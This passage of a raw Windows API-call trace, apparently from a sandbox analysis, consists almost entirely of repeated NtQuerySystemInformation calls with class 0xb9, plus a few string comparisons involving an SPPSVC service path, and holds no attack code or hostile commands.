Length=0x28, ResultLength=0x0) [0287.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c7c0, Length=0x28, ResultLength=0x0) [0287.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c660, Length=0x20, ResultLength=0x0) [0287.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c5e0, Length=0x20, ResultLength=0x0) [0287.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c5e0, Length=0x20, ResultLength=0x0) [0287.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c5e0, Length=0x20, ResultLength=0x0) [0287.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8a0, Length=0x38, ResultLength=0x0) [0287.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8a0, Length=0x38, ResultLength=0x0) [0287.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c720, Length=0x20, ResultLength=0x0) [0287.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c6b0, Length=0x20, ResultLength=0x0) [0287.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c6b0, Length=0x20, ResultLength=0x0) [0287.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0287.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0287.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0287.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x50, ResultLength=0x0) [0287.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x50, ResultLength=0x0) [0287.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x50, ResultLength=0x0) [0287.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x50, ResultLength=0x0) [0287.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x38, ResultLength=0x0) [0287.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c920, Length=0x28, ResultLength=0x0) [0287.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c920, Length=0x28, ResultLength=0x0) [0287.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c920, Length=0x28, ResultLength=0x0) [0287.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c990, Length=0x28, ResultLength=0x0) [0287.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x38, ResultLength=0x0) [0287.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0287.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0287.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x38, ResultLength=0x0) [0287.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c970, Length=0x20, ResultLength=0x0) [0287.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8f0, Length=0x20, ResultLength=0x0) [0287.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8f0, Length=0x20, ResultLength=0x0) [0287.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8f0, Length=0x20, ResultLength=0x0) [0287.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x38, ResultLength=0x0) [0287.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c970, Length=0x20, ResultLength=0x0) [0287.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c900, Length=0x20, ResultLength=0x0) [0287.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c900, Length=0x20, ResultLength=0x0) [0287.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0287.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0287.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0287.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x50, ResultLength=0x0) [0287.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x50, ResultLength=0x0) [0287.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x50, ResultLength=0x0) [0287.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x50, ResultLength=0x0) [0287.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x38, ResultLength=0x0) [0287.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c920, Length=0x28, ResultLength=0x0) [0287.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c920, Length=0x28, ResultLength=0x0) [0287.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c920, Length=0x28, ResultLength=0x0) [0287.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c990, Length=0x28, ResultLength=0x0) [0287.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x38, ResultLength=0x0) [0287.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0287.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0287.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x38, ResultLength=0x0) [0287.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c970, Length=0x20, ResultLength=0x0) [0287.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8f0, Length=0x20, ResultLength=0x0) [0287.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8f0, Length=0x20, ResultLength=0x0) [0287.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8f0, Length=0x20, ResultLength=0x0) [0287.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x38, ResultLength=0x0) [0287.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c970, Length=0x20, ResultLength=0x0) [0287.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c900, Length=0x20, ResultLength=0x0) [0287.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c900, Length=0x20, ResultLength=0x0) [0287.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x50, ResultLength=0x0) [0287.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x28, ResultLength=0x0) [0287.889] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0287.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x50, ResultLength=0x0) [0287.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x50, ResultLength=0x0) [0287.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x50, ResultLength=0x0) [0287.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0287.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0287.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0287.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0287.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb50, Length=0x28, ResultLength=0x0) [0287.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0287.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x28, ResultLength=0x0) [0287.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x28, ResultLength=0x0) [0287.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0287.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x20, ResultLength=0x0) [0287.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x20, ResultLength=0x0) [0287.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x20, ResultLength=0x0) [0287.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x20, ResultLength=0x0) [0287.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0287.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x20, ResultLength=0x0) [0287.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0287.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0287.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x50, ResultLength=0x0) [0287.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x28, ResultLength=0x0) [0287.908] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0287.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x50, ResultLength=0x0) [0287.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x50, ResultLength=0x0) [0287.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x50, ResultLength=0x0) [0287.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0287.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0287.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0287.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, 